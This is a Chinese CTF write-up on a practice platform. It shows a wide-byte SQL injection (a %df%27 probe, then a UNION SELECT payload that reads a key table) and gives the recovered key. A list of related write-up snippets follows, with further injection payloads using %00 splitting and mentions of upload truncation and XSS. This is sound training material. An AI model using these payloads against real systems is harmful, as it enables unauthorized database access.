CTF練習平臺sql注入測試writeup
練習網址http://103.238.227.13:10083/
頁面截圖
由以上提示我們可以看出查詢key表,id=1的string欄位,為此我們可以從最基本的注入開始嘗試
發現並不報錯,想到了寬位元組注入,並且可以驗證一下:
http://103.238.227.13:10083/index.php
?id=%df%27
輸出結果如下
說明存在注入漏洞,我們可根據題的提示用寬位元組注入練習下,如果不懂寬位元組注入的可以看一下這個連結學習http://blog.csdn.net/helloweb2014/article/details/60757497
注入如下
http://103.238.227.13:10083/index.php
?id=-1%a1%27 union select 1,string from `key`%23
輸出結果如圖:
得到key為
54f3320dc261f313ba712eb3f13a1f6d |
相關推薦
CTF練習平臺sql注入測試writeup
練習網址http://103.238.227.13:10083/ 頁面截圖 由以上提示我們可以看出查詢key表,id=1的string欄位,為此我們可以從最基本的注入開始嘗試 發現並不報錯,想到了寬位元組注入,並且可以驗證一下: http://103.238.227.1
BugKuCTF(CTF-練習平臺)——WEB-SQL注入1
%00截斷 http://103.238.227.13:10087/?id=-1%20uni%00on%20sel%00ect%201,database()%23 http://103.238.227.13:10087/?id=-1%20uni%00on%20
CTF/CTF練習平臺-XSS【xss注入及js unicode編碼及innerHTML】
原題內容:http://103.238.227.13:10089/Flag格式:Flag:xxxxxxxxxxxxxxxxxxxxxxxx題目有點坑啊,注入點都沒說明,去群裡問的,這題注入點為id(get方式),id的值會進行替換後進入s補充了這個,好了,繼續做題右鍵原始碼&l
CTF-練習平臺 Web writeup
簽到題web2檔案上傳測試經典的題目,用burp抓包得到如下 然後我們更改一下上傳路徑然後用%00截斷一下即可Content-Disposition: form-data; name="file"; filename="3.png%001.php"1計算題改一下瀏覽器中的te
bugku CTF-練習平臺 部分writeup
MISC 1.俄羅斯套娃 下載下來一個壓縮包 題目是bc957e26ff41470c556ee5d09e96880b 好像是MD5解出來是misc。。。雜項題 包裡三個檔案 試了試常規找不到密碼,就試試偽加密 解壓出來了。 先看看flag.zip 提示
CTF/CTF練習平臺-login1【sql約束攻擊】
原題內容: http://47.93.190.246:49163/ flag格式:SKCTF{xxxxxxxxxxxxxxxxx} hint:SQL約束攻擊 題目提示很明顯了,這裡直接幾個截圖解釋
CTF-練習平臺 Web writeup By Assassin [暫時完結]
簽到題 web2 檔案上傳測試 經典的題目,用burp抓包得到如下 然後我們更改一下上傳路徑然後用%00截斷一下即可 Content-Disposition: form-data; name="file"; filena
CTF-練習平臺 writeup web
bugku Web WriteUp 剛剛接觸ctf沒多久,做ctf-練習平臺上的題目,有些新的題目,在網上沒有找到對應的writeup,所以做了之後就想自己寫一個,也順便理理自己的思路。(沒有太多經驗…可能對有些題目的理解還不深刻…) 簽到題
【bugku】CTF-練習平臺writeup
CTF-練習平臺writeupMISC滴答~滴看標題基本就知道是摩爾斯密碼“.”、”-“,直接線上摩爾斯解密 聰明的小羊小羊。。。老套路 翻柵欄,柵欄密碼。。。比較簡單,直接看出來是兩欄加密 KEY{sad23jjdsa2}這是一張單純的圖片??看題目估計是道隱寫術的題,先儲
SqlMap自動化SQL注入測試工具簡紹
Sqlmap是一個開源的滲透測試工具,可以自動檢測和利用SQL注入漏洞並接管資料庫伺服器。它配備了強大的檢測引擎,為終極滲透測試儀提供了許多小眾功能,以及從資料庫指紋識別,從資料庫獲取資料到訪問底層檔案系統以及在作業系統上執行各種命令。 演示: # 使用SqlMap在特定目標URL上進行SQ
安全測試中sql注入測試思路
在找好需要測試的功能點之後,針對每種功能點(引數),sql注入測試一般遵循下面步驟: 1. 測試注入型別,數字型or字元型 如果引數中直接包含字母,那麼直接可以判斷是字元型引數,如id=4a。 若引數是數字通常可以考慮輸入表示式來判斷,如id=6,可嘗試輸入id=
軟體測試 -- SQL注入測試跟JS注入測試
1. SQL注入的概念: 1.1 概念: SQL注入就是將SQL命令插入到Web表單提交或輸入域名或頁面請求的查詢字串,最終達到欺騙伺服器執行的惡意SQL命令. 1.2 SQL如何產生: 1) WEB開發人員無法保證所有的輸入都已經過濾 2) 資料庫未做
CTF/CTF練習平臺-各種繞過喲【sha1陣列型別比較漏洞】
原題內容: 各種繞過喲 http://120.24.86.145:8002/web7/ 吐槽一下,,,提示真的噁心,,誤導 以前總結過,沒做過題目,今天算是遇到了,,,mark一下 一張圖解釋
實驗吧 ctf 簡單的sql注入3
解題連結: http://ctf5.shiyanbar.com/web/index_3.php id=1為注入點 http://ctf5.shiyanbar.com/web/index_3.php?id=1然後就用sqlmap來跑一下 結果能出答案 我也是抱著嘗試的態度
BugKuCTF(CTF-練習平臺)——Crypto-聰明的小羊
題目描述: 題目解答: 1)思路:看到柵欄,想到柵欄密碼,2個說明每組字數為2,在網址http://www.qqxiuzi.cn/bianma/zhalanmima.php中解密 2)解密: 故flag為:KEY{sad23jjdsa2}
BugKuCTF(CTF-練習平臺)——Crypto-簡單加密
題目描述: 問題解答: 1)思路:初見題目,這是一段加密文字,觀察後兩位是相同的字母,這讓我想到是凱撒加密與base64相結合的加密方式。 1)解密: 1.根據ASCII表,將上述文字轉換為十進位制,網址http://www.ab126.com/goju/1711
CTF/CTF練習平臺-welcome to bugkuctf【php //filter及php //input】
原題內容: http://120.24.86.145:8006/test1/ 首先b
CTF/CTF練習平臺-本地包含【eval函式閉合及程式碼段的理解】
原題內容: 地址:http://120.24.86.145:8003/ 怎麼說呢,難
CTF/CTF練習平臺-phpcmsV9【phpcms 9 6 漏洞利用】
原題內容: 一個靶機而已,別搞破壞。 多謝各位大俠手下留情,flag在根目錄裡txt檔案裡
BugKuCTF(CTF-練習平臺)——Crypto-ok
題目描述: 題目解答: 1)思路:看到題目,說明是Ook編碼(這裡分享13種不常見的編碼http://news.mydrivers.com/1/190/190926.htm),在網址http://tool.bugku.com/brainfuck/中解密 2)解密: